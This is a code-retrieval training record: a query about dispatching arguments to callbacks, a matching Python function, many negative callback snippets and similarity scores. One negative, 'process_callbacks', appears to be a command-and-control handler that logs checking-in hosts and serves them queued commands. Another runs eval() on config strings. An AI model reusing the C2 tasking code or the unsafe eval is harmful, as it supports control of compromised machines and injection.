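with open(path, 'wb') as cout:
    pickle.dump([1, 2, 3], cout)
print(grab(path))  # -> [1, 2, 3]
os.remove(path)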
Sends args and kwargs to any configured callbacks. This handles the cases where the 'callbacks' variable is ``None``, a single function, or a list.
def _multiple_callbacks(callbacks, *args, **kwargs):
    if isinstance(callbacks, list):
        for cb in callbacks:
            cb(*args, **kwargs)
        return
    if callbacks:
        callbacks(*args, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run_callbacks(self, **kwargs):\n for callback in self.CALLBACKS:\n getattr(self, callback)(**kwargs)", "def callbacks(*args, addCallback: Script=None, clearAllCallbacks: bool=True, clearCallbacks:\n bool=True, describeHooks: bool=True, dumpCallbacks: bool=True, executeCallbacks:\n bool=True, hook: AnyStr=\"\", listCallbacks: bool=True, owner: AnyStr=\"\",\n removeCallback: Script=None, **kwargs)->List[AnyStr]:\n pass", "def __call__(self, args, kwargs):\n callback = self._callback_ref()\n if callback is not None:\n callback(*args, **kwargs)", "def subscribe_callbacks(self, *args):\n for arg in args:\n self.callbacks.append(arg)", "def trigger(self, callback_type, *args):\n if self.callbacks.has_key(callback_type):\n for cb in self.callbacks[callback_type]:\n cb(*args)", "def callback(self, *args, **kwargs):\n\n for key, (methodwrapper, onetime) in list(self.callbacks.items()):\n try:\n methodwrapper(*args, **kwargs)\n except:\n log.err()\n\n if onetime:\n del self.callbacks[key]", "def callback(self, fun: Callable[[], None] | None) -> None:", "def _forward_cb(self, *args, **kwargs):\n for callback_function in self.changeCallbacks:\n callback_function(*args, **kwargs)", "def _run_callbacks(cls, cb_method, *args):\n global CALLBACKS\n for c in CALLBACKS:\n attr = getattr(c, cb_method)\n attr(*args)", "def execute_callbacks(self, name, *args, **kwargs):\n callbacks = self.callbacks.get(name, {}).items()\n for order, func in callbacks:\n func(self, *args, **kwargs)\n\n return len(callbacks)", "def handle_admincallbacks(bot, ievent):\n cbs = getcallbacktable()\n if not ievent.rest: ievent.reply(\"callbacks: \", cbs)\n else:\n try: ievent.reply(\"%s callbacks: \" % ievent.rest, cbs[ievent.rest])\n except KeyError: ievent.reply(\"no such callbacks available\")", "def get_callbacks(callbacks: List[str]) -> List:\n callback_functions = []\n for callback in callbacks:\n try:\n callback_functions.append(eval(callback))\n except (NameError, AttributeError) as err:\n sys.exit(f'{err}. 
Accepted callbacks from {tf}, {sm}, {tfa}')\n return callback_functions", "def set_callbacks(self, **dic_functions):\n for action in self.interface.CALLBACKS:\n try:\n f = dic_functions[action]\n except KeyError:\n pass\n else:\n setattr(self.interface.callbacks, action, f)\n manquantes = [\n a for a in self.interface.CALLBACKS if not a in dic_functions]\n if not manquantes:\n logging.debug(\n f\"{self.__class__.__name__} : Tous les callbacks demandés sont fournis.\")\n else:\n logging.warning(\n f\"{self.__class__.__name__} didn't set asked callbacks {manquantes}\")", "def dispatch_callback(self, callback):\n self.callback_queue.put(lambda: callback.func(*callback.args))", "def _trigger_callback(self, *args, **kwargs):\n for callback_function in self.changeCallbacks:\n callback_function(self, *args, **kwargs)", "def execute(self):\n args = self.args\n \n for callNumber in xrange(len(self.callback)):\n args = (self.callback.pop(0))(*args)\n \n if not (isinstance(args,tuple) or isinstance(args,list)):\n args = [args]\n \n return args", "def initialise_callbacks():\n adapter = mice.ice.createObjectAdapterWithEndpoints(\"Callback.Client\", \"tcp -h 127.0.0.1\")\n adapter.activate()\n cb=mice.Murmur.ServerCallbackPrx.uncheckedCast(adapter.addWithUUID(ServerCallbackI(s, adapter)))\n s.addCallback(cb)", "def handle_cb(self, obj, cb, kwargs):\n callbacks = kwargs.get(\"callbacks\", {})\n callback_exception_failure = kwargs.get(\"callback_exception_failure\", True)\n\n callback = callbacks.get(cb, None)\n if callback:\n m = \"Running callback function {f} for {n}\".format\n m = m(f=callback, n=cb)\n self.mylog.debug(m)\n try:\n obj = callback(handler=self, obj=obj, kwargs=kwargs)\n except Exception as e:\n if callback_exception_failure:\n raise\n else:\n m = \"Exception occurred in callback function {f} for {n}: {e}\".format\n m = m(f=callback, n=cb, e=e)\n self.mylog.exception(m)\n else:\n m = \"No callback function specified for {n}\".format\n m = m(n=cb)\n self.mylog.debug(m)\n return obj", "def perform_callback(self, *args, **kwargs):\n pass", "def execute(self):\n\t\tfor callback in self:\n\t\t\tcallback()", "def setEventCallbacks(self, callbacks):\n self.ws.setEventCallbacks(callbacks)", "def fit_callbacks():\n # pylint: disable=no-value-for-parameter\n return model_callbacks() + logging_callbacks()\n # pylint: enable=no-value-for-parameter", "def __init__(self, callback, *args, **kwargs):\n self.callback = lambda: callback(*args, **kwargs)", "def runCallback(self, callback=\"help\"):\n self.initialize()\n\n # run the start callback\n tools.run_callback(\"start\", {'request': self._request})\n\n config = self._request.getConfig()\n data = self._request.getData()\n\n # invoke all callbacks for the 'callback'\n handled = tools.run_callback(callback,\n {'request': self._request},\n mappingfunc=lambda x,y:x,\n donefunc=lambda x:x)\n\n # do end callback\n tools.run_callback(\"end\", {'request': request})", "def execute(self):\n results = []\n \n for callback in self.callback:\n results.append(callback(*self.args))\n \n return results", "def do_callback(self, sensor):\n if sensor in self._callbacks:\n for callback in self._callbacks[sensor]:\n try:\n callback(None)\n except Exception as e:\n self.stick.logger.error(\n \"Error while executing all callback : %s\",\n e,\n )", "def collecting_callback():\n calls = []\n\n def cb(**kwargs):\n calls.append(kwargs)\n\n return cb, calls", "def 
set_callbacks(self):\n\t\tself.set_floor_callbacks()\n\t\tself.set_button_callbacks()\n\t\tself.set_stop_callback()", "def on_post_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __post_exec_callbacks)\n for callback in __post_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on post-execution callback using %s\", callback)", "def on_pre_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __pre_exec_callbacks)\n for callback in __pre_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on pre-execution callback using %s\", callback)", "def setObjectCallbacks(self, callbacks):\n self.ws.setObjectCallbacks(callbacks)", "def fire_event(self, callback: Callable[..., bool], **kwargs):\n if not callable(callback):\n raise RuntimeError('Callback method (callback) is not a callable.')\n\n # get developer passed trigger_ids\n trigger_ids: list | None = kwargs.pop('trigger_ids', None)\n\n for trigger_id, config in list(self.configs.items()):\n if trigger_ids is not None and trigger_id not in trigger_ids:\n # skip config that don't match developer provided trigger ids\n continue\n\n try:\n # get a session_id specifically for this thread\n session_id: str = self.create_session_id()\n\n # only required for testing in tcex framework\n self._tcex_testing(session_id, trigger_id)\n\n # get an instance of PB module with current\n # session_id and outputs to pass to callback\n outputs: list | str = config.tc_playbook_out_variables or []\n if isinstance(outputs, str):\n outputs = outputs.split(',')\n playbook = self.get_playbook(context=session_id, output_variables=outputs)\n\n self.log.info(f'feature=trigger-service, event=fire-event, trigger-id={session_id}')\n\n # current thread has session_id as name\n self.service_thread(\n name=session_id,\n target=self.fire_event_trigger,\n args=(\n callback,\n playbook,\n session_id,\n trigger_id,\n config,\n ),\n kwargs=kwargs,\n session_id=session_id,\n trigger_id=trigger_id,\n )\n except Exception:\n self.log.trace(traceback.format_exc())", "def execute():\n command_line_args = argv[1:]\n args = cli(command_line_args)\n\n callback = args.callback\n kwargs = {\n k: v\n for k, v in args.__dict__.items()\n if k != \"callback\"\n }\n\n main(callback, **kwargs)", "def set_callback(self,callback = None):\n self.callback = callback", "def set_callback(self, callback_frames=None, callback_audio=None):\n if callback_frames is not None:\n if not callable(callback_frames):\n raise ValueError(\"`callback_frames` must be callable.\")\n self._callback_frames = callback_frames\n if callback_audio is not None:\n if not callable(callback_audio):\n raise ValueError(\"`callback_audio` must be callable.\")\n self._audio_player.set_callback(callback_audio)", "def call_on(self, target):\n for cb in self._callbacks:\n if hasattr(target, cb):\n c = getattr(target, cb)\n if callable(c):\n c()", "def _callback(self, *args):\n\n # Check to see if the first argument is a 'help' call\n if((args) and (args[0] in [\"help\",\"?\"])):\n self.console.writeln(self.help)\n else:\n self.callback(*args)", "def callback(self, callback, *args, **kwds):\n\n def _exit_wrapper(exc_type, exc, tb):\n callback(*args, **kwds)\n\n # We changed the signature, so using @wraps is not appropriate, but\n # setting __wrapped__ may still help with introspection\n _exit_wrapper.__wrapped__ = callback\n self.push(_exit_wrapper)\n return callback # Allow use as a decorator", "def register_callback(self, callback: 
Callable[[], None]) -> None:\r\n print(\"register callback called\")\r\n self._callbacks.add(callback)", "def dispatch_post_action_callbacks(atexit, s_db, s_cur, d_db, d_cur):\n if not atexit:\n pa = nori.core.cfg['post_action_callbacks']\n else:\n pa = post_action_callbacks\n num_cbs = len(pa)\n for i, cb_t in enumerate(pa):\n cb, args, kwargs = cb_t[0:3] # there might be a 4th\n nori.core.status_logger.info(\n 'Calling post-action callback {0} of {1}...' .\n format((i + 1), num_cbs)\n )\n ret = cb(*args, s_db=s_db, s_cur=s_cur, d_db=d_db, d_cur=d_cur,\n **kwargs)\n nori.core.status_logger.info(\n 'Callback complete.' if ret else 'Callback failed.'\n )\n if (not atexit) and ((cb, args, kwargs) in post_action_callbacks):\n post_action_callbacks.remove((cb, args, kwargs))", "def create_callback(self, chain):", "def add_callbacks(self, defaults):\n defaults.update(self.mouse_callbacks)\n self.mouse_callbacks = defaults", "def _set_callback(self):\n self.callback_f = None\n if self.callback:\n self.callback_f = inspector_mtw(**self.callback_kwargs)", "def get_callback_list(hyperparams: Dict[str, Any]) -> List[BaseCallback]:\n\n def get_module_name(callback_name):\n return \".\".join(callback_name.split(\".\")[:-1])\n\n def get_class_name(callback_name):\n return callback_name.split(\".\")[-1]\n\n callbacks = []\n\n if \"callback\" in hyperparams.keys():\n callback_name = hyperparams.get(\"callback\")\n\n if callback_name is None:\n return callbacks\n\n if not isinstance(callback_name, list):\n callback_names = [callback_name]\n else:\n callback_names = callback_name\n\n # Handle multiple wrappers\n for callback_name in callback_names:\n # Handle keyword arguments\n if isinstance(callback_name, dict):\n assert len(callback_name) == 1, (\n \"You have an error in the formatting \"\n f\"of your YAML file near {callback_name}. 
\"\n \"You should check the indentation.\"\n )\n callback_dict = callback_name\n callback_name = list(callback_dict.keys())[0]\n kwargs = callback_dict[callback_name]\n else:\n kwargs = {}\n callback_module = importlib.import_module(get_module_name(callback_name))\n callback_class = getattr(callback_module, get_class_name(callback_name))\n callbacks.append(callback_class(**kwargs))\n\n return callbacks", "def execute_callbacks(query, result):\n for func in self.callbacks:\n func(query, result)", "def Invoke (self, owner: typing.Any, eventArguments: typing.Optional[EventArguments]) -> None:\n\n\t\tif not isinstance(eventArguments, EventArguments) and eventArguments is not None:\n\t\t\traise Exceptions.IncorrectTypeException(eventArguments, \"eventArguments\", (EventArguments, None))\n\n\t\tfor callback in self: # type: typing.Callable\n\t\t\tcallback(owner, eventArguments)", "def callback(self, function: Optional[Callable[[int], None]]) -> None:", "def bind(self, event_type, callback):\n\n # Each event type has a list of callback functions to be called.\n # If we have not seen the event type yet, then create an empty list,\n # otherwise append to the existing list:\n self.callbacks.setdefault(event_type, []).append(callback)", "def forward_callbacks(self, obj):\n obj.add_change_callback(self._forward_cb)", "def execute(self):\n results = []\n\n for callNumber in xrange(len(self.callback)):\n results.append( (self.callback.pop(0))(*self.args.pop(0)) )\n\n return results", "def set_asyncgen_hooks(*args, **kwargs): # real signature unknown; NOTE: unreliably restored from __doc__\n pass", "def callback(cb): \n def cb_func(*args):\n self = args[0]\n (value, is_last) = cb(*args)\n if (value is not None):\n self._cb_return[cb.__name__] = self._cb_return.get(cb.__name__, []) + \\\n [value]\n if (is_last):\n self._cb_event[cb.__name__] = True\n return cb_func", "def addCallback(self,newCallback,*newArgs):\n self.callback.append(newCallback)\n self.args.append(newArgs)", "def apply_callback(self, all_values: Namespace) -> Any:\n if not callable(self.callback):\n return self.value\n\n try:\n val = self.callback(self.value, all_values)\n except TypeError as terr: # pragma: no cover\n # len() takes exactly one argument (2 given)\n # <lambda>() takes 1 positional argument but 2 were given\n if not re.search(r\"takes .+ argument .+ given\", str(terr)):\n raise\n val = self.callback(self.value)\n\n if isinstance(val, Exception):\n raise PyParamTypeError(str(val))\n return val", "def _notify_callback_event(self, event, data):\n # Notify callbacks\n for cback in self.callbacks:\n cback.invoke(self, event, data)", "def connect(\n cls,\n on_start=None,\n on_resume=None,\n on_pause=None,\n on_stop=None,\n on_save=None,\n on_reset=None,\n ):\n if on_start and on_start not in cls.start_callback:\n cls.start_callback.append(on_start)\n\n if on_resume and on_resume not in cls.resume_callback:\n cls.resume_callback.append(on_resume)\n\n if on_pause and on_pause not in cls.pause_callback:\n cls.pause_callback.append(on_pause)\n\n if on_stop and on_stop not in cls.stop_callback:\n cls.stop_callback.append(on_stop)\n\n if on_save and on_save not in cls.save_callback:\n cls.save_callback.append(on_save)\n\n if on_reset and on_reset not in cls.reset_callback:\n cls.reset_callback.append(on_reset)", "def callback_method(value):\n assert value == 'With callback'", "def callback(self, *args):\n raise NotImplementedError()", "def dummy_callback(obj):\n pass", "def set_stream_callbacks(self):\n from telnetlib3.telopt import 
TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON\n from telnetlib3.telopt import CHARSET, NAWS\n\n # wire extended rfc callbacks for terminal atributes, etc.\n for (opt, func) in (\n (TTYPE, self.send_ttype),\n (TSPEED, self.send_tspeed),\n (XDISPLOC, self.send_xdisploc),\n (NEW_ENVIRON, self.send_env),\n (NAWS, self.send_naws),\n (CHARSET, self.send_charset),\n ):\n self.stream.set_ext_send_callback(opt, func)", "def restipy(callback,\n pre_call=lambda env,sr,args,kwargs: None,\n post_call=lambda env,sr,call_ret: None):\n _func_table[callback.__name__] = (callback, pre_call, post_call)", "def register(self, callback, filters = []):\n\t\tself.callbacks.append((callback, filters))\n\t\tself.events[str(callback)] = []", "def set_callback(self, callback):\n if not callable(callback):\n raise TypeError(\"'callback' must be callable\")\n\n self._callback = callback", "def call_start_cbs(self):\n try:\n for (cb,args) in self._start_cbs:\n cb(self.userdata, self.get_initial_states(), *args)\n except:\n smach.logerr(\"Could not execute start callback: \"+traceback.format_exc())", "def __trigger(self, toBeExecuted, args = []):\n\n self.__connect()\n [ f(args) for f in toBeExecuted ]\n self.__disconnect()", "def subscribe(self, callback: Callable) -> None:\n self.callbacks.add(callback)", "def add_callback(self, done_cb: Callable[[], None] = None) -> None:\n\n if done_cb is not None:\n self.callbacks.append(done_cb)", "def callbacks(self, val_generator: DataGenerator) -> List[Callback]:\n if self.train_mode in [\"classifier\", \"both\"]:\n model = self.classifier\n model_dir = \"class_model\"\n elif self.train_mode == \"combined\":\n model = self.combined\n model_dir = \"com_model\"\n\n # Callback for evaluating the validation dataset\n eval_callback = EvalCallback(\n model=model, val_generator=val_generator, layers=self.n_blocks\n )\n\n # callback for saving the best model\n checkpoint_callback = ModelCheckpoint(\n f\"{model_dir}/{model_dir}\" + \"_{epoch:04d}_{val_acc:.4f}.h5\",\n monitor=\"val_acc\",\n verbose=0,\n save_best_only=True,\n save_weights_only=False,\n mode=\"max\",\n )\n\n \"Make sure checkpoint callback is after the eval_callback, dependency\"\n return [eval_callback, checkpoint_callback]", "def add_callback(self, callback):\n if callback is not None:\n self.callbacks.append(callback)", "def subscribe(callback, keys):\n assert type(keys) in (set, list, tuple)\n _subscribers[callback] = keys", "def append(self, callback):\n\t\tif callback is None:\n\t\t\tpass\n\t\telif callable(callback):\n\t\t\tlist.append(self, WeakMethod(callback))\n\t\telif isinstance(callback, list, tuple):\n\t\t\tfor i in callback:\n\t\t\t\tself.append(i)\n\t\telse:\n\t\t\tassert False", "def add(self, callback):\n self._callbacks += as_cb_list(callback)", "async def send(self, *args, **kwargs) -> None:\n for callback in self:\n res = callback(*args, **kwargs)\n if asyncio.iscoroutine(res) or isinstance(res, asyncio.Future):\n await res", "def run_callback(self, name, handle_exceptions=True, show_traceback=None,\n **kwargs):\n for fcn in self._cb_dict[name]:\n try:\n fcn(**kwargs)\n except Exception as ex:\n if handle_exceptions:\n self.logger.debug('Callback %s failed' % (name, ),\n exc_info=True)\n if show_traceback is not None:\n print('Callback %s failed' % (name, ))\n util.print_traceback(ex, f=show_traceback)\n\n else:\n raise", "def set_update_callbacks(self, update_tr_pos_callback, update_view_model_callback) -> None:\n\n self.update_tr_position = update_tr_pos_callback\n self.update_view_model = 
update_view_model_callback", "def _dummy_callback():\n assert False, \"TRESPASS - set_callback() must be called\"", "def set_request_handler(self, callback: Callable[[ACLMessage], Any]):\n self.callback = callback", "def add(self, callback, *args, **kwargs):\n\n self.list.append((callback, args, kwargs))", "def add_callbacks(am, ifttkey, ifttevent):\n if _debug:\n print(\"add_callbacks\", am)\n\n xurl = IFTT_URL.format(ifttevent, ifttkey)\n for c in am.mac_targets.values():\n call_val = {\n 'url': xurl,\n 'id': c.name,\n 'cur_val': -1\n }\n c.add_callback(iftt_callback, call_val)", "def on_events(self, insert_callback=None, set_callback=None,\n del_callback=None, reverse_callback=None, sort_callback=None):\n self.on_insert(insert_callback)\n self.on_set(set_callback)\n self.on_del(del_callback)\n self.on_reverse(reverse_callback)\n self.on_sort(sort_callback)", "def add_asyn_callback(self, fcn, **kwargs):\n assert(hasattr(fcn, '__call__'))\n self._asyn_callbacks[fcn] = kwargs", "def Callbacks (self) -> typing.List[typing.Callable]:\n\n\t\tcallbacks = list()\n\n\t\tcallbackReferenceIndex = 0\n\t\twhile callbackReferenceIndex < len(self._callbackReferences):\n\t\t\tcallback = self._callbackReferences[callbackReferenceIndex]()\n\n\t\t\tif callback is None:\n\t\t\t\tself._callbackReferences.pop(callbackReferenceIndex)\n\t\t\t\tcontinue\n\n\t\t\tcallbacks.append(callback)\n\t\t\tcallbackReferenceIndex += 1\n\n\t\treturn callbacks", "def register_callbacks(self, cbs):\n assert isinstance(cbs, dict) # cbs must be a dictionary\n cbs_key_list = list(cbs.keys())\n enum_key_list = [enum.value for enum in self._action_type_enum]\n \n # TODO replace by check for compulsory keys only, all action types do not apply to all actions\n #assert(len(set(enum_key_list) - set(cbs_key_list)) == 0)\n\n self._cbs = {}\n for key in cbs_key_list: # check syntax\n print \"Registered callback for action %s\" % key\n self._cbs[key] = cbs[key]\n rospy.logdebug(\"Callbacks registered.\")", "def prepare_callbacks(output_dir: str) -> Tuple[Callable]:\n time = datetime.now().strftime(\"%y%m%d-%H%M\")\n log_dir = os.path.join(output_dir, \"tensorboard\" + time)\n logging.info(\"Tensorboard directory: %s\" % log_dir)\n tensorboard = TensorBoard(log_dir=log_dir, batch_size=1000, write_images=True,\n write_graph=True)\n csv_path = os.path.join(output_dir, \"csv_logger_\" + time + \".txt\")\n logging.info(\"CSV logs: %s\" % csv_path)\n csv_logger = CSVLogger(csv_path)\n\n filepath = os.path.join(output_dir, \"best_\" + time + \".model\")\n model_saver = ModelCheckpoint(filepath, monitor=\"val_recall\", verbose=1, save_best_only=True,\n mode=\"max\")\n return tensorboard, csv_logger, model_saver", "def register_callbacks(self):\n self.either_edge_cb = self.pi.callback(\n self.gpio,\n pigpio.EITHER_EDGE,\n self.either_edge_callback\n )", "def runEventCallbacks(self, event, *args):\n\n if not event in self.EVENT_TYPES:\n raise Exception(\"XnatIo (onEvent): invalid event type '%s'\"%(\\\n event))\n if not hasattr(self, 'eventCallbacks__'):\n print('self has no attribute eventCallbacks__')\n return\n\n for callback in self.eventCallbacks__[event]:\n #print(f\"EVENT CALLBACK {event}\")\n callback(*args)", "def _setup_callbacks(lst, log_models, metrics_logger):\n # pylint: disable=no-name-in-module\n from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback\n\n tb = _get_tensorboard_callback(lst)\n if tb is None:\n log_dir = _TensorBoardLogDir(location=tempfile.mkdtemp(), is_temp=True)\n\n out_list = lst + 
[_TensorBoard(log_dir.location)]\n else:\n log_dir = _TensorBoardLogDir(location=tb.log_dir, is_temp=False)\n out_list = lst\n out_list += [__MLflowTfKeras2Callback(log_models, metrics_logger, _LOG_EVERY_N_STEPS)]\n return out_list, log_dir", "def fire_event(self, event = None):\n for e in self.events:\n if e[\"event\"] == event:\n if type(e[\"args\"]) == type([]):\n e[\"callback\"](*e[\"args\"])\n elif type(e[\"args\"]) == type({}):\n e[\"callback\"](**e[\"args\"])\n elif e[\"args\"] == None:\n e[\"callback\"]()\n else:\n e[\"callback\"](e[\"args\"])\n return True", "def Handler(self, *events: str, colon: bool = False,\n ircv3: bool = False) -> Callable:\n ...", "def cbhandler(cls, session, cb_input):\n commandhandler = dict()\n commandhandler.update(dict({'sleep': cls.sleep}))\n commandhandler.update(dict({'dupsession': cls.reinitsession}))\n for i in range(len(cb_input)):\n command = cb_input[i]['cmd']\n arg = cb_input[i]['arg']\n if command in commandhandler.keys():\n cb_input[i]['ret'] = commandhandler[command](arg, session)\n else:\n print(\"Unknown command passed\", command)\n cls.log(3, \"Unknown command passed\", command)", "def on_recv(self, callback):\n if callback is None:\n self._on_recv = callback\n else:\n\n def wrap_recv(header, body):\n callback(body)\n\n self._on_recv = wrap_recv", "def async_callback(self, callback, *args, **kwargs):\n if callback is None:\n return None\n\n if args or kwargs:\n callback = functools.partial(callback, *args, **kwargs)\n\n def wrapper(*args, **kwargs):\n try:\n return callback(*args, **kwargs)\n except Exception, e:\n logging.error('Exception during callback', exc_info=True)\n\n return wrapper", "def call(manager, *args):\n for instance in manager:\n instance.callback(*args)", "def call_subscribers(self, *args, **kwargs) -> None:\n for subscriber in self.get_subscribers():\n subscriber(*args, **kwargs)", "def on_set(self, callback):\n self._set_callback = callback if callable(callback) else _void", "def on_set(self, callback):\n self._set_callback = callback if callable(callback) else _void", "def __call__(self, *args, **kwargs):\n value = None\n for callback in self.callbacks:\n try:\n local_value = callback(*args, **kwargs)\n except Exception as e:\n ip = get_ipython()\n if ip is None:\n self.log.warning(\"Exception in callback %s: %s\", callback, e, exc_info=True)\n else:\n ip.showtraceback()\n else:\n value = local_value if local_value is not None else value\n return value", "def process_callbacks(host, typ):\n \n ip = host.replace(\"-\", \".\")\n src = typ\n call_time = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n\n if os.path.isfile(\"/tmp/cc/calls.log\"): # write callback to calls log\n with open(\"/tmp/cc/calls.log\", 'a') as f:\n s = \"{0:<25} {1:<16} {2:<10}\\n\".format(call_time, ip, src)\n f.write(s)\n else:\n with open(\"/tmp/cc/calls.log\", 'w') as f:\n s = \"{0:<25} {1:<16} {2:<10}\\n\".format(call_time, ip, src)\n f.write(s)\n\n com_file = \"/tmp/cc/hosts/\" + ip # read commands from the appropriate file\n if os.path.isfile(com_file):\n with open(com_file, 'r') as f:\n c = f.read()\n os.remove(com_file)\n return c + \"\\n\"\n else:\n return \"#lmao\\n\"", "def __call__(self, event_type, details):\n cb = self.callback\n if cb is None:\n return\n if self._details_filter is not None:\n if not self._details_filter(details):\n return\n kwargs = dict(self._kwargs)\n kwargs['details'] = details\n cb(event_type, *self._args, **kwargs)", "def setup_callbacks(self):\n\n super(ArtellaMayaPlugin, self).setup_callbacks()\n\n 
callbacks.register(callback.Callbacks().AfterOpenCallback, self._after_open)\n callbacks.register(callback.Callbacks().SceneBeforeSaveCallback, self._before_save)\n callbacks.register(callback.Callbacks().BeforeOpenCheckCallback, self._before_open_check)\n callbacks.register(callback.Callbacks().AfterLoadReferenceCallback, self._after_load_reference)\n callbacks.register(callback.Callbacks().BeforeCreateReferenceCheckCallback, self._before_reference_check)" ]
[ "0.702277", "0.66514504", "0.65428776", "0.651266", "0.6477689", "0.61787194", "0.6089447", "0.60846204", "0.60464215", "0.60348064", "0.59095436", "0.590122", "0.5900241", "0.5882658", "0.5858614", "0.5747529", "0.57051486", "0.5680165", "0.56781036", "0.5653725", "0.5636546", "0.5616152", "0.55880874", "0.55756146", "0.55564874", "0.5518041", "0.5517807", "0.5497091", "0.54964554", "0.5467474", "0.54554087", "0.54337764", "0.53963876", "0.5376686", "0.53637636", "0.53586507", "0.53429586", "0.5341724", "0.5330287", "0.53171694", "0.53044516", "0.5258516", "0.52428", "0.52409726", "0.52407306", "0.5232459", "0.5208991", "0.51972187", "0.5185989", "0.51786935", "0.5166441", "0.5166003", "0.51637214", "0.51533335", "0.51472944", "0.51440096", "0.5140474", "0.5125386", "0.5092434", "0.50855476", "0.50774086", "0.5075293", "0.506917", "0.5054927", "0.5029005", "0.5028113", "0.5025376", "0.5016435", "0.5013147", "0.5012792", "0.5011033", "0.5005025", "0.5000638", "0.49992755", "0.49989694", "0.49805203", "0.49717963", "0.49652502", "0.4951834", "0.49488762", "0.4946779", "0.4941704", "0.4939725", "0.49365917", "0.49338582", "0.49238867", "0.49184102", "0.49156764", "0.49146008", "0.49060258", "0.49052462", "0.4904084", "0.49033925", "0.4894868", "0.48883152", "0.48883152", "0.48833558", "0.48815137", "0.48797992", "0.48743755" ]
0.7574884
0
Adds and connects attributes from the default encore FKIK switch anim setup to rig nodes in the scene. Imports the default control setup from file, or you may specify source_ctrl in args to override it
def make_fkikSwitch_connection_attrs(partpre=None, side='Lt', source_ctrl=None, tag_name='switch', snapTo=None, add_attrs=None):
    switch_anim = ''
    newnodes = []
    if source_ctrl is not None:
        switch_anim = source_ctrl
    if not partpre:
        partpre = 'mypart_'

    if source_ctrl is None:
        # import the default switcher control from the config dir shipped next to utils
        # filepath = r'C:/Users/Nicob/Documents/maya/scripts/rigBot/rigBot/config/switcher_anim.mb'
        system_base_path = os.path.dirname(utils.__file__)
        base_path = os.path.join(system_base_path, 'config')
        file_path = os.path.join(base_path, 'switcher_anim.mb')
        newnodes = mc.file(file_path, i=1, ignoreVersion=1, rnn=1, mergeNamespacesOnClash=0, rpr=partpre, ra=1, options="v=0;", pr=1)
        switch_anim = partpre + '_CTL'

    # pos switcher grpOffset node if snapTo
    if snapTo is not None:
        utils.snap_to_transform(snapTo, switch_anim.replace('CTL', 'grpOffset'))
        mc.setAttr(switch_anim.replace('CTL', 'grpOffset') + '.r', 0, 0, 0)

    # get value of tags and sort into ik and fk vis groups
    iks = []
    fks = []
    nodes = mc.ls('*.' + tag_name)
    for node in nodes:
        if partpre in node and side in node:
            mode = mc.getAttr(node)
            if mode:
                mode = mode.lower()
                if 'ik' in mode:
                    iks.append(node.split('.')[0])
                if 'fk' in mode:
                    fks.append(node.split('.')[0])

    # drive ik control visibility directly from the FK_IK attribute
    for ik in iks:
        ikpar = utils.get_parent(ik)
        if ikpar is None:
            mc.connectAttr(switch_anim + '.FK_IK', ik + '.visibility', f=1)
        else:
            mc.connectAttr(switch_anim + '.FK_IK', ikpar + '.visibility', f=1)

    # fk controls get the reversed value so they hide when ik is on
    rvn = mc.createNode('reverse', name=switch_anim + '_fkik_vis_rv')
    mc.connectAttr(switch_anim + '.FK_IK', rvn + '.inputX')
    for fk in fks:
        fkpar = utils.get_parent(fk)
        if fkpar:
            mc.connectAttr(rvn + '.outputX', fkpar + '.visibility', f=1)

    if add_attrs is not None:
        for att in add_attrs:
            mc.addAttr(switch_anim, ln=att, min=0, max=1, dv=0, k=1)

    # strip dag-path prefixes from the freshly imported nodes
    nns = []
    for nn in reversed(newnodes):
        sn = nn.split("|")
        nns.append(mc.rename(nn, sn[-1]))

    anim = mc.ls(partpre + '_CTL')
    # if mc.objExists(partpre + '_skeleton_grp'):
    #     mc.parent(anim, partpre + '_skeleton_grp')
    return anim
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def init_from_file(self):\n self.src.load('start.00') \n self.oe1.load('start.01')\n #self.det.load('start.02')\n print('NOTE: variables loaded from start.00/start.01 files')", "def setup(args):\n cfg = get_cfg()\n add_imaterialist_config(cfg)\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"))\n cfg.merge_from_file(args.config_file)\n \n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n # Setup logger for \"imaterialist\" module\n setup_logger(output=cfg.OUTPUT_DIR, distributed_rank=comm.get_rank(), name=\"imaterialist\")\n return cfg", "def setup_threeCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['lf_lid01_tp01_ccc', 